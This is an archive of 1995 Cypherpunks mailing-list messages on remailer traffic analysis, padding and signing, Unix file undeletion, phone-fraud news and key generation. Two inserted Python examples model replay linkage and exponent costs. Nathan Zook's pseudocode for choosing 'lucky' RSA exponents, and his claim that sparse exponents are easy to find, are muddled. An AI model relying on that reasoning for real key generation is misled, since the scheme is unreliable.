                                     ...  __o
                                    ..   `\<,
Chris.Claborne@SanDiegoCA.ATTGIS.COM...(_)/(_).            CI$: 76340.2422
---------------------------------------------------------------------------
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Available on any Pub Key server.
PGP encrypted mail welcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Date: Sat, 28 Jan 95 19:09:45 PST
To: perry@imsi.com
Subject: Re: Again, where to upload code?
In-Reply-To: <9501290244.AA21613@snark.imsi.com>
Message-ID: <199501290309.WAA14018@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I suspect ftp.csua.berkeley.edu will take them... Sameer?
> 
> Perry

Tried it. Permission denied.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 28 Jan 95 19:11:45 PST
To: Robert Rothenberg <rrothenb@ic.sunysb.edu>
Subject: Re: Again, where to upload code?
In-Reply-To: <199501290309.WAA14018@libws2.ic.sunysb.edu>
Message-ID: <9501290311.AA21674@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



You need to make arrangements beforehand...

Robert Rothenberg says:
> > I suspect ftp.csua.berkeley.edu will take them... Sameer?
> 
> Tried it. Permission denied.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Date: Sat, 28 Jan 95 19:50:23 PST
To: Todd Masco <cactus@hks.net>
Subject: Re: NNTP archives
In-Reply-To: <199501282315.SAA22879@bb.hks.net>
Message-ID: <Pine.3.89.9501282218.A585148030-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I would like to use it to read c'punks in netscape.   What do I put in 
the box which says NNTP news reader?  Just putting the machine name seems 
to produce no result...

A.Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law  |
U.Miami Law School          | MFROOMKI@UMIAMI.IR.MIAMI.EDU
PO Box 248087               | 
Coral Gables, FL 33146 USA  | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Masco <cactus@hks.net>
Date: Sat, 28 Jan 95 20:29:06 PST
To: cypherpunks@toad.com
Subject: Re: NNTP archives
Message-ID: <199501290425.XAA25516@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Michael Froomkin writes:
 > I would like to use it to read c'punks in netscape.   what do I put in 
 > the box which says NTTP news reader?  just putting the machine name seems 
 > to produce no result...

Not knowing netscape, I couldn't tell you.  The newsgroup name should
probably be in there, tho: it's hks.lists.cypherpunks on nntp.hks.net.
The URL might be something like "nntp://nntp.hks.net/hks/lists/cypherpunks"
or "nntp://nntp.hks.net/hks.lists.cypherpunks", but I'm just guessing.
- --
Todd Masco     | "If we don't make utter fools of ourselves from time to time,
cactus@hks.net |  we grow smug - that is, we do not grow at all." - T. Peters
     Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLysYkSoZzwIn1bdtAQGEXgF/QzfXQmikP3AGwXBjJaUPPXPDpmy8dlVM
NDcjQbtG125EIoBXGLa9GR6dfrp4HhBy
=fGHU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sat, 28 Jan 95 21:48:02 PST
To: nzook@bga.com (Nathan Zook)
Subject: Re: Why encrypt intra-remailernet.
In-Reply-To: <Pine.3.89.9501281651.A2705-0100000@edwin.bga.com>
Message-ID: <199501290547.AAA20285@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook:
|  
|     Suppose Alice sends Bob a message e(M) through Chaum.  Eve, a strong
| opponent, wants to trace the message.  She keeps track of all outgoing mail
| from Alice, an MD5 hash of all incoming messages to Bob, and outgoing from
| Bob.  Eve then sends Chaum e(M), and waits for a matching MD5 to Bob that
| doesn't correlate to an outgoing MD5 from Bob.  (Eve knows that Bob is a
| remailer.)
|  
|     Gentlemen, I believe that I have just stumbled upon a strong proof of
| the necessity of remailer auto-encryption of all messages.  Since the
| session key is PRG, MD5 will change (a lot;).  Furthermore, remailer auto-
| encryption allows the mailers to number their messages to each other.  A
| low number means a re-transmit from the remailer, which is not possible,
| unless some sort of ACK system is in place, and even then, would still
| flag.  Of course, if the remailers _sign_ their messages (on the way out)
| as well, you could compare the timestamps of the signatures with the
| message itself.

	This is a strong argument for encrypting your chain of messages,
using premail, or chainmail, or something similar.  Why the remailers
should do this is not clear at all from your argument.  Remailer
operators should be discouraged from cooperation beyond that which is
needed.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume
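
The hash comparison described in the quoted text above, worked through as an added example (not code from anyone in this thread): a hop that only strips its own layer emits the same bytes for a replayed input, while a hop that re-encrypts to the next hop under a fresh random session value does not. The toy SHA-256 counter-mode cipher stands in for PGP, the keys and message are constructed, and the replay cache is an extra variant the thread does not discuss.

```python
import hashlib
import os

# Constructed sample values; nothing here comes from a real remailer.
CHAUM_KEY = b"constructed-chaum-key"
BOB_KEY = b"constructed-bob-key"
MESSAGE = b"constructed test message from Alice to Bob"


def keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    """Toy keystream (SHA-256 in counter mode). Stand-in for PGP, not for real use."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:n])


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt under a fresh 16-byte random value, modelling PGP's random session key."""
    nonce = os.urandom(16)
    ks = keystream(key, nonce, len(plaintext))
    return nonce + bytes(p ^ k for p, k in zip(plaintext, ks))


def unseal(key: bytes, blob: bytes) -> bytes:
    """Strip one layer; deterministic for a given input blob."""
    nonce, body = blob[:16], blob[16:]
    ks = keystream(key, nonce, len(body))
    return bytes(c ^ k for c, k in zip(body, ks))


def wire_digest(data: bytes) -> str:
    """MD5 of the bytes seen on the wire, as the observer in the thread records."""
    return hashlib.md5(data).hexdigest()


class Remailer:
    """One hop. link_key=None forwards the inner payload unchanged."""

    def __init__(self, own_key, link_key=None, replay_cache=False):
        self.own_key = own_key
        self.link_key = link_key
        self.seen = set() if replay_cache else None

    def forward(self, incoming: bytes):
        if self.seen is not None:
            tag = hashlib.sha256(incoming).digest()
            if tag in self.seen:
                return None  # identical input already processed: drop it
            self.seen.add(tag)
        inner = unseal(self.own_key, incoming)
        if self.link_key is None:
            return inner  # same input always yields the same output bytes
        return seal(self.link_key, inner)  # fresh session value on every send


def build_message() -> bytes:
    """Alice's nested message: inner layer for Bob, outer layer for Chaum."""
    return seal(CHAUM_KEY, seal(BOB_KEY, MESSAGE))


def replay_links(hop: Remailer, message: bytes) -> bool:
    """True if a replayed copy produces an outgoing digest matching the first one."""
    first = hop.forward(message)
    replayed = hop.forward(message)
    if first is None or replayed is None:
        return False
    return wire_digest(first) == wire_digest(replayed)


if __name__ == "__main__":
    msg = build_message()
    print("strip-only hop linkable:  ", replay_links(Remailer(CHAUM_KEY), msg))
    print("re-encrypting hop linkable:", replay_links(Remailer(CHAUM_KEY, BOB_KEY), msg))
    print("replay-cache hop linkable: ",
          replay_links(Remailer(CHAUM_KEY, replay_cache=True), msg))
```

With the re-encrypting hop Bob removes two layers (the link layer, then Alice's inner layer) to recover the message.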



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Sun, 29 Jan 95 01:16:13 PST
To: storm@marlin.ssnet.com
Subject: Re:  Philadelphia CyberCrime
Message-ID: <9501290914.AA08224@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> Heard on the news today that they arrested a plumber and are holding
> him in lieu of $50,000 bail.
> He used a PC to crack into the phone system and set up 'Ultra' call
> forwarding which forwarded calls to other plumbers' businesses to his.
> He then took the calls and told the callers that his company was
> covering for the one they actually called.

The irony is that the original dial telephone switch
was invented to prevent this kind of problem, 
by a Kansas City undertaker named Strowger who thought his 
competitor was bribing the phone operators to redirect business,
and wanted to get the humans out of the loop.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Sun, 29 Jan 95 01:35:47 PST
To: cypherpunks@toad.com
Subject: Re:  Even more unix holy wars.
Message-ID: <9501290933.AA08361@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


(Undeleting files is a security issue that's still got 
_some_ tenuous connection to cypherpunks :-)

> How would I go around undeleting a file under Unix?  It's easy on the
> Mac.  Doing it under DOS is ugly, but it works.  But with unix, there
> is no way.

Sure there is.  Multiple ways, depending on your objectives.
All with different syntax, since this _is_ Unix :-)

The simple way, implemented by lots of universities, is a fake delete,
which actually renames or moves the file to some hidden location
instead of deleting it; the undelete program renames it back,
and there's a space-scavenger that genuinely deletes old
rename-deleted files after a few days.  Undeletes after that
consist of getting the file from tape backup.

While the System V filesystem doesn't save enough pointers to 
guarantee getting complete files back from deletion (if the space
they used hasn't been reused already), there have been undeletes
that scrounge up the newest n blocks off the free list.  Of course,
those were the first blocks to get used in new files, so it wasn't
much use in a multi-user system, but it was there.  Besides,
disk drives on multi-user machines are always >95% full,
and often over 98% full, so deleted files are fair game anyway...

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Sun, 29 Jan 95 05:08:35 PST
To: cypherpunks@toad.com
Subject: Heavy Weather
Message-ID: <199501291307.FAA13336@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Just finished reading Bruce Sterling's newest novel.  
    I enjoyed it and suggest it will interest hard sci-fi fans.
    It's a very much post cypherpunk world he writes about, e.g.:

    "    ... It all had to do with unbreakable encryption, digital
    authentification, anonymous remailing, and network untraceability.
    These were all computer networking techniques that had once been
    considered very odd and naughty.  They were also so elementary to
    do, that once they were in place, they couldn't be stopped 
    without tearing the whole Net down.

    Of course once these techniques were in place, they conclusively
    destroyed the ability of governments to control the flow of
    electronic funds, anywhere, anytime, for any purpose.  As it
    happened, this process had pretty much destroyed any human control
    at all over the modern electronic economy. ..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Sun, 29 Jan 95 02:51:09 PST
To: cypherpunks@toad.com
Subject: Tabloid TV coverage of pedophiles using BBS - with feedback #s
Message-ID: <m0rYXEE-0002H6C@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


On TV as I am hacking here, is some Tabloid Trash called
"The Crusaders",  which I would have definitely flipped off
once the late movie was over, if it hadn't been for these
'intriguing' sound bites they ran:

"Your children may fall victim to pedophiles in the safety of
 their own bedroom!  And the Crusaders are out to stop them..."

"The newest high tech scheme sex offenders use on your children,
 and how you can stop it!  Child molesters on your home computer!"

I am staying tuned through stories on adoption reunions and nursing 
home neglect, just to see how to protect my children...

(20 min. later)

They show a lot of kids using computers, then modems and BBS systems.
They mentioned the usefulness of nets for 'homework' and games, but:

"We recently tapped into a bulletin board containing hordes of files,
 from lingerie shots to shocking pictures... that show anything goes."

"10% of the adult population on the boards are looking to solicit children,
 says a police chief in (Amish country in PA)."

From there I expected a lot worse, but actually it got a whole lot better:

"Talk to your kids, and don't use the computer as a babysitter... parents
 need to know there are dangerous people out there..."

An FBI expert said that the 'best way' to combat pedophiles was to educate
police how computers work, and second to make people aware without implying
that a computer is a bad thing.  He said he thought teenagers would seek
out sexually explicit material and that current 'protections' (e.g. warnings
on explicit files) were inadequate.  [What this had to do with pedophilia he
didn't say.  All the kids interviewed had been solicited on other premises...
e.g. one had been lured to a pedophile's home to install a non-existent net.
It seems that none of the pedophiles had lured kids with sexual materials
but no point was made of this.  They indirectly implied a relationship.]

Other advice offered was to keep kids from offering personal information on
the BBSs, and to accompany your child the first time they go to meet someone
they met on a BBS.

There was no brainless advocacy of censorship, nor a call to ban anonymity
(although the police chief in PA said he thought pedophiles were 'emboldened'
by the 'anonymous computer environment' which is probably more or less true),
even though they talked directly to one (male) kid who'd actually been raped.
This was exploitative, but it was also real, and it was just stark enough to
make the point.  No hysteria, the kid was calm.  This was the kid who had
been lured to install the net.

Given that they actually gave practical advice that might actually work and
was not generally hysterical, it was about as good as one might expect.  They
fell short of saying that the pedophilia was isolated and unrelated to most
of the graphic material on the boards.  The "10%" was the only number they
offered. Apparently they could find only 2 convictions for BBS-related
pedophilia in the US.  

Actually it seemed to me that the most objectionable thing was this crazy
10% estimate, which might mean 10% of the adults on purely porn-oriented BBS
sites, but it was left implied that 10% of *all* adult BBS/network users were
trying to lure children into sexual situations!

After that the most objectionable thing was the hysterical tag lines which
are mandatory on Tabloid TV.  They didn't seem to be written by the reporter.

Reporter's name was Howard Thompson, editor was Ralph Herman
Fax number for the show is 818-841-6500.

Transcripts of the show are available for $6 at 1-800-777-T-E-X-T (Burrelle)

Craig








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 29 Jan 95 06:46:52 PST
To: cypherpunks@toad.com
Subject: Re: Secure (?) Remailer-net
Message-ID: <Pine.3.89.9501290816.A10826-0100000@edwin.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


First, in case you all haven't noticed, I am seriously async here.  Sorry
that I sometimes seem to alternately really miss or firmly grasp the
obvious.


From: Hal <hfinney@shell.portal.com>
>From: Nathan Zook <nzook@bga.com>
>>     The traffic analysis that we've seen so far mainly just documents
>> tcmay's "everybody a remailer" concept.  If you look, you will notice that
>> these analyses all assume that Alice and Bob are _not_ remailers
>> themselves, and for a good reason.  If Alice and Bob _are_ remailers,
>> analysis of the type used here is worthless, especially if Alice and Bob
>> have a policy of not sending any mail unless they first receive garbage,
>> and of sending out garbage whenever they get a letter.
>
>Realistically, though, everybody is not a remailer, and there are no
>prospects of everybody becoming a remailer anytime soon, so the analyses
>of Wei and others are certainly relevant.
>


Yes, but... 
Presumably those who feel that they need a remailer and are willing to put
out the effort to use one might also feel that they need a higher level of
security.  I suppose that my remark might be more accurately:
"mainly just documents the superiority of the 'everybody a remailer'
concept for TA purposes."  Of course, if the remailer-in-a-box isn't much
harder to use than PGP was two years ago, then maybe "everybody" will...


>>     HOWEVER, the analysis makes another assumption--that messages are
>> indistinguishable.  This assumption does not correlate, as I understand it,
>> with the current remailer net.
>
>Mixmaster is supposed to do splitting and, I think, padding.  I hope to
>have time to look at it soon.  It sounds very good.
>
>>     First, the message is signed with the sender's key.  (More on that
>> later.)
>
>I did not see why this should be done.
>

No?  Isn't the InterNet currently under a serious packet-spoofing attack?
Don't we expect Eve to be AKA NSA?  If I run a remailer, I want to know
that I'm not being lied to in the process.  That insistence might just save
the legal butt of the guy being spoofed, by demonstrating that the packet
did not in fact originate from the remailer.  Just because remailers are
legal doesn't mean that the govt won't still try to shut them down...


>>     Suppose a signed message to be forwarded is smaller than the standard
>> packet size.  The sending remailer adds a Cutmarks:  header.  At the end of
>> the message, the cutmark is added, followed by sufficient garbage to fill
>> out the standard packet size.  The message is then pgp'ed to the recipient
>> _with COMPRESS = OFF_.
>
>A better approach IMO is to embed the message length in the encrypted
>information (as PGP does) and pad with cryptographic random garbage
>(which PGP could be patched to do).
>

In this instance garbage is defined as cryptographic random.  If the
message has a length indicator in the clear, then Eve can read it.
(Remember, Eve runs snakoil@nsa.gov.)  Therefore, such a marker has to be
_inside_ the wrapper.  Given this, (that everything is PGP wrapped) there
is always the chance that PGP will compress a message, even one with
cryptographically strong bits in the end.  While compression can improve
protection, it is not likely to do so if the original message was already
PGPed.  Only "clear" messages, therefore, risk losing protection.  As you
note, such messages don't deserve as much help as opaque ones.


>>     Upon receipt, the message is decrypted, and its origination can then be
>> triply verified (at least).  From: line, packet size, and PGP signature.
>> Since the message claims to be from a packeting remailer, the packet size
>> should be the standard one.  The recipient now has the message that was
>> sent to it.  This message is probably itself encrypted, so it can be
>> handled (almost) as if this message were just received.  This includes
>> stripping the garbage and (probably) decrypting the message to get the
>> forwarding information.
>
>Why does the remailer care where the message came from?  What difference
>does that make?  I can see the final recipient caring about the original
>sender, so a PGP sig makes sense at that level, but why at each hop?
>

See below.  Basically, we don't want to be spoofed ourselves.  Bad
security for our systems.  Admittedly, this is probably not a real problem
today.  See my sig.


>>     Note that this system would allow the extropian remailer to be
>> compatible with Matt Ghio's alias system.  (Right now, the remailer doesn't
>> like separate pgp packets, or packets it can't read, or something.) Under
>> the current system, the precaution is entirely warranted.
>
>I don't think so.  The problem with Miron's extropy remailer is that it
>only passes through the contents of a PGP block.  For anonymous addresses
>to work, the (chained,encrypted) address must be in a PGP block which
>precedes the message body.  I don't see how any cutmarks idea would
>affect this.
>

Sure it does.  If the whole thing is inside a PGP wrapper, then it is
secure.  "Only passing through the contents of a PGP block" is currently a
security measure that makes good sense.  But if you have two separate
blocks _inside_ an outer wrapper, you already have full security.  Strip
off the outside, find two more wrappers.  Strip the first, get remailing
instructions.  Attempt to strip the second.  Fail.  Attach second wrapper
to forwarded message.  Full security.


>>     To make life even more fun, there is no good reason that non-remailers
>> cannot be in on the action!  Alice, sending to Bob through Chaum, pretends
>> to be a remailer.  That is, she prepares her message to Bob, (encrypted),
>> and adds the Request-Remailing-To:  Bob@nowhere.org, and signs it.  She
>> then observes that the message is too small, so she adds the Cutmarks:
>> header, etc.  When Chaum receives the packet, he opens it, removes the
>> cutmarks, and sees a signature he does not know.  Chaum then sends a
>> request to pgp-key-server@omniscient.gov for the key, and holds the message
>> until he gets it.  He then compares the address and name on the key
>> received to the message.  The signature is good, so he is ready to send the
>> packet to Bob.
>
>Again, why does the remailer go to all this trouble to verify a
>signature from Alice?  That sig is for Bob!  She may not even want to
>post her public key for everyone; Bob may be the only one who has it.  I
>don't understand why the remailer, which exists to hide identities, is
>going to such trouble to verify them on its own.
>

Alice signs her messages to the remailer because she doesn't want anyone
spoofing her use of the remailer.  If a message goes in at 00:00:00.01, 1
Jan, 2001 that is "From:" her, it is FROM her.  More of the same reasoning.
This key doesn't have to have anything to do with the key she uses with
Bob.  It is the one that she wants the general public to use for HER.


>> But Bob can be in on the game as well, since there is no
>> reason that he cannot handle the Cutmarks:, the signature, and the nested
>> encryption.  In fact, Alice could include a copy of Bob's key in the
>> message for Chaum to use, after a Recipient-Key:  header.
>
>Alice is the one who should encrypt the message for Bob, not the
>remailer!  Are you suggesting that she should let the remailer see the
>message contents?
>

NoNoNoNoNoNoNo! ;) The key she includes is Bob's public key.  The same one
that is on the key servers.  This is so the message can be standard sized
for the final trip to Bob.  As we have noted, messages are quite vulnerable
at this stage.  If every message that Bob gets from Chaum "looks the same",
who is to say which is which?


>> Bob can also
>> verify that the message was actually routed through Chaum.
>
>Why on earth does he care?  I really don't see what problem you are
>solving here with all this checking.
>

Suppose you were using the remailer net.  Would you care to know that
someone was spoofing a node?  I would.  It would indicate that someone is
either hacking the system (probably no big deal), or that someone might be
shadowing a remailer.  That is, the remailer is no longer secure.  Spoofing
is a big deal on the net generally, and if we start being used a lot, we
will have to deal with it as well.  Why not now?


>> If Chaum is
>> concerned that, at some future time, Eve might subpoena his key ring in
>> order to demonstrate that Alice and Bob are using Chaum, Chaum can
>> alternately request keys that he does not need from the servers, and delete
>> (older) keys in the ring.
>
>Eve would be more likely to subpoena Chaum's secret key ring.  A public
>key ring proves nothing.
>

Ever hear of "guilt by association"?  See my sig.


>>     In other words, if all the remailers can handle nested pgp packets and
>> cutmarks, we are close to moving all small messages to a standard size.
>
>This mostly makes sense (although as I said I prefer simply enhancing the
>crypto program to take a parameter for output pad size) but I don't see
>where all the rest of it came from.
>

If the message length is world readable, it is world readable.  The super-
wrapping makes sure that it is not.  It also makes clear messages
indistinguishable from opaque ones inside the net.  See below.


>>     What if the file is too big?
>>  
>>     If the file is too big, break it in pieces.  We need a header,
>> Multipart Message:  n of m.  Note that since this is assumed to be _inside_
>> a pgp wrapper, it is secure.  The recipient could hold and merge the files
>> as needed.  If the message to be forwarded is too big, split and continue.
>> Since the messages are ascii armored, the split/combine protocol is to
>> concatenate.  Message parts could be made equal size to minimize the chance
>> of a message barely bumping over the limit as it moves.  Of course, Alice
>> could break her message to Bob directly, but we cannot assume that all
>> would do this for us.
>
>I believe Mixmaster provides a client mode to do this.  I prefer putting
>more functionality in the hands of the users and not relying on kindly
>old Uncle Remailer to do it for you.
>

Yes, but...  Breaking an overly large file makes it indistinguishable from
standard sized ones.  See below.


>>     This also means that if Alice sends a message to Bob in the clear
>> through Chaum, and David, that the message will be encrypted from Chaum to
>> David.  Thus, if Eve wants to know which message from Chaum to David is the
>> one from Alice to Bob, (perhaps to know that it is _not_ the message from
>> Frank she is interested in) she knows only that it was one of the messages
>> from Chaum to David after Chaum got the message from Alice, and before
>> David sent it to Bob.  While Chaum and David can both read the message, it
>> still provides mixing capabilities inside the remailer net itself, and thus,
>> some protection to Frank.  (Who apparently needs the help.)
>
>This is a commonly made suggestion, but philosophically I am opposed.  We
>got into this fix (lack of privacy) by letting people rely on others to
>do things for them.  It's time for people to take responsibility on their
>own.  The kind of thing you are suggesting provides the illusion of
>privacy.  Never trust remailer operators!
>

below:  (Couldn't resist ;-)

The point of "Uncling" insecure messages has nothing to do with improving
the security of the insecure messages.  I agree, as a good member of the
Libertarian-Christian wing of the Republican party (NYET!) that these folks
deserve snakeoil.  But we're _not_ doing it for them.  We're doing it for
Frank, who does everything right.  If Eve doesn't know anything we don't
have to tell her about Alice's messages, then she gains no free negative
information about Frank's.  Judging by the remailer stats, there are a lot
of messages traveling "in the clear." These messages currently do nothing
for those of us that do things right.  It's time that they do.

So I'm not encouraging Alice to trust Chaum.  I'm encouraging Chaum to give
Frank all the help he can.  Frank, who just blew the whistle on the
"Justice" Department.  Frank, who does everything right, and might even
stand out because he does.  Frank, the guy we are all really doing this
for.

To put it another way, if we really don't want centralized solutions, if no
one should trust any of us, if the users should provide all of their own
cover, then why are you running a remailer?  Let them telnet to port 25.
Let them do whatever.

Maybe that was too harsh.  I don't advocate holding people's hands.  What I
_do_ want to do is to provide the best service that we can.  Note that from
earlier and current work (thanks, guys!), we see that even if the remailer
net itself is completely secure, the sender and receiver can still be
traced with near-exponential speed.  

So our systems provide a delay in tracking of a couple of months.  Big
deal.  The TLAs routinely take years to build a serious case.  If we are
going to be any help to folks that _really_ need it, we have to extend the
black box all the way to people outside the net.  As you said, not everyone
will be remailers anytime soon.

So if I am trusting a remailer net, wouldn't it be nice to know that no one
but the ends can even think about compromising the message?  (Until one of
them does.)  Wouldn't it be nice to know if the ends were being shadowed?

--

As for signing intra-net traffic, suppose, at some time in the future, we
agree that we do, in fact, need them.  Will it be easier or harder to
implement then?


>>     A word on remailer keys:  Since pgp uses square-and-multiply for
>> exponentiation, we see that the amount of work needed to sign a message is
>> d(m) * (d(e) + o(e)) where d(m) is the digits of the modulus, d(e) digits
>> of the exponent, and o(e) is the number of ones in e.  (I don't remember
>> the technical term.) Since the public key is small, each of the parts of
>> the private key will be large, BUT, there is no reason to assume that we
>> cannot get lucky, and find an m such that d(e) + o(e) is much smaller than
>> expected, (d(m) * 3/2, roughly) thus greatly reducing the system demand of
>> the remailer.  In fact, it might be possible to move to 768-bit keys for
>> those that have kept their sizes down in the past.  If pgp handles each
>> prime separately, we look for a double-lucky modulus.  (And a source of
>> random numbers that does not involve striking keys!)
>
>Since the secret key d is effectively a random number from 0 to m, you
>would have to create, say, 1000 key pairs to have a good chance of
>finding a d that was as much as 10 bits shorter than m.  Then o(d) might
>be 5 bits shorter.  So you'd be done from 768+384 to 758+379 or about a
>1% reduction in time.  And it will take a while to generate 1000 keys.
>To get a 2% reduction you would have to generate 1000000 keys.  I hope
>you have a lot of time on your hands.
>

Actually, I did make this error when I first considered this, also.  We do
not hope for a short key.  In fact, we know that the key will be long, when
viewed in parts, as I now believe that it is.  We hope that the key will be
0 rich.  The chance of this just comes off of the binomial distribution,
which is not nearly so bad.  Sorry.  And a, say, 10% improvement above
expected allows a corresponding length increase--which does something
_more_ than improve security by 10% ;)


>I'm sorry to have been so negative, 

Not at all.  We're not talking about anything as important as unix vs
windows.  You must be a better person than I.  I usually love shooting down
lame-brain ideas.  ;-)


>                                   but this message is part of a long
>tradition advocating putting more responsibility into the remailer net.
>I strongly feel that better solutions put power into the users' hands.
>I oppose centralized solutions.
>
>Hal

See below.  I mean above.  I mean below:.  This is not, IMHO, a centralized
solution, as I see it.  As I see it, this is a _minimal_ solution to the
problem that today, our net is laughably easy to crack.  I assume that
anyone that wants to spoof will have a reason to do so.  I assume that if
the NSA/FBI/CIA/DEA/DIA/ATF wants to trace a message, they will bring the
full power of their systems to bear, including reading this list.

Anyone else?  Tim's usually pretty good at panning me. :-P  :-)


Nathan

---
Cypherpunk's precautions today look hopelessly paranoid.  Until you
consider that their precautions from yesterday are now considered
hopelessly quaint.
---

"PGP?"                        "ITAR!"                          "Oh, RKBA!"


                   |--------------------------------------------------+
  ----------------- 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com> )
 |44B3D866 3D551E2E ---------------------------------------------------
 |F89222A6 338CDE24/ |
  -----------------
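
The disagreement above about "short" versus "0 rich" private exponents, worked through as an added example (not part of the original post). It counts operations in a plain square-and-multiply loop and compares the two probabilities, assuming the exponent's bits are uniformly random; the function names are illustrative.

```python
from math import comb

E = 0x10001  # the public exponent discussed in the thread


def modexp_counting(base, exp, mod):
    """Left-to-right square-and-multiply.

    Returns (result, squarings, multiplies). One squaring is done per
    exponent bit and one extra multiply per 1-bit, which is the
    d(e) + o(e) count from the post (each step is one modular multiply).
    """
    result, squarings, multiplies = 1, 0, 0
    for bit in bin(exp)[2:]:
        result = result * result % mod
        squarings += 1
        if bit == "1":
            result = result * base % mod
            multiplies += 1
    return result, squarings, multiplies


def p_short(bits_saved):
    """Chance that a uniformly random exponent has its top bits_saved bits zero."""
    return 2.0 ** -bits_saved


def p_sparse(nbits, max_ones):
    """Chance that a uniform nbits-bit string has at most max_ones 1-bits
    (lower tail of Binomial(nbits, 1/2))."""
    return sum(comb(nbits, k) for k in range(max_ones + 1)) / 2 ** nbits


def keys_to_try(p):
    """Expected number of independent key generations until one succeeds."""
    return 1.0 / p


def compare(nbits=768, bits_shorter=10, ones_saved_by_shortening=5):
    """Two ways to save the same number of modular multiplications.

    Defaults follow the numbers quoted in the thread: a 768-bit exponent,
    10 bits shorter with 5 fewer 1-bits, i.e. 15 operations saved.
    """
    saved = bits_shorter + ones_saved_by_shortening
    expected_ops = nbits + nbits // 2
    return {
        "expected_ops": expected_ops,
        "target_ops": expected_ops - saved,
        "keys_if_short": keys_to_try(p_short(bits_shorter)),
        "keys_if_sparse": keys_to_try(p_sparse(nbits, nbits // 2 - saved)),
    }


if __name__ == "__main__":
    _, sq, mul = modexp_counting(5, E, 1000003)
    print(f"e = 0x10001: {sq} squarings + {mul} multiplies")
    for name, value in compare().items():
        print(f"{name:>15}: {value:,.1f}")
    # A saving of about 10% on a 768-bit exponent needs about 115 fewer 1-bits.
    print(f"P(<= 269 ones of 768) = {p_sparse(768, 269):.2e}")
```

With the thread's numbers, the same 15-operation saving takes about 1024 candidate exponents by the "short" route and fewer than 10 by the "0 rich" route; the binomial tail for a saving of about 10% on a single 768-bit exponent is below 1e-12.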





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 29 Jan 95 06:49:56 PST
To: cypherpunks@toad.com
Subject: Always after me lucky primes...
Message-ID: <Pine.3.89.9501290858.A10885-0100000@edwin.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
So Hal thinks that it would take a lot of work to get a private exponent
that is even marginally short?
 
Let n be the random number generated by keystrokes.
Let m be n mod (0x10001 * 8 * 9 * 25 * 49).
Let s be m mod 0x10001.
Let n1 be n + 0x10000 - s.  Let t be m + 0x10000 - s mod 8 * 9 * 25 * 49.
Let t2 be m mod 8, t3 be m mod 9, t5 be m mod 25, t7 be m mod 49.
Let n2 be n1 / 2, n3 be n1 / 3, n4 be n1 / 4, ... n7 be n1/7.
 
using t's, determine if n1 is a mult of 2, 3, 5, 7.
if so, check appropriate element of {n2, n3, n4, n5, n6, n7} for primeness.
(there may not be one).
if not check n1.
EndELSE
 
Loop:
Determine if some element of {n1,...n7} is prime 
If so, let d = (n1 + 1 ) / 0x10001
     [equiv: n1/0x10001 + 1]
  Let k = 0's in d.
     [check previous flamage for best method]
  If k is below threshold, save and exit.
     (you may wish to ensure that k is _above_ a certain threshold...)
EndIF
EndIF
 
Let n1 += 0x10001
using t's, determine if n1 is a mult of 2, 3, 5, 7. 
if so, increment the appropriate elements of {n2, ... n7}.
also, check appropriate element of {n2, n3, n4, n5, n6, n7} for primeness.
  (there may not be one).
if not check n1.
EndELSE
 
EndLoop:
 
:-D
Cypherpunks write algorithms, and argue about operating systems.
 
 
Clearly, if you wish to be a stickler about the number of digits that you
end up with, you wouldn't use n2 through n7.  The t's, however, or some
version thereof, would speed the checking noticeably.
 
 
Nathan
 
I hereby provide notice of claim to all intellectual copyrights relating to
the above algorithm(s) against all entities using the algorithms for
commercial purposes, specifically against PKP, and Viacrypt, their
assignees, and anyone claiming the devolution of their patents. For non-
commercial use, including inclusion into PGP (tm) packages that will be
distributed free of charge, Fred Fish and similar distributions, I release
all claims, providing a copy of this notice is included.
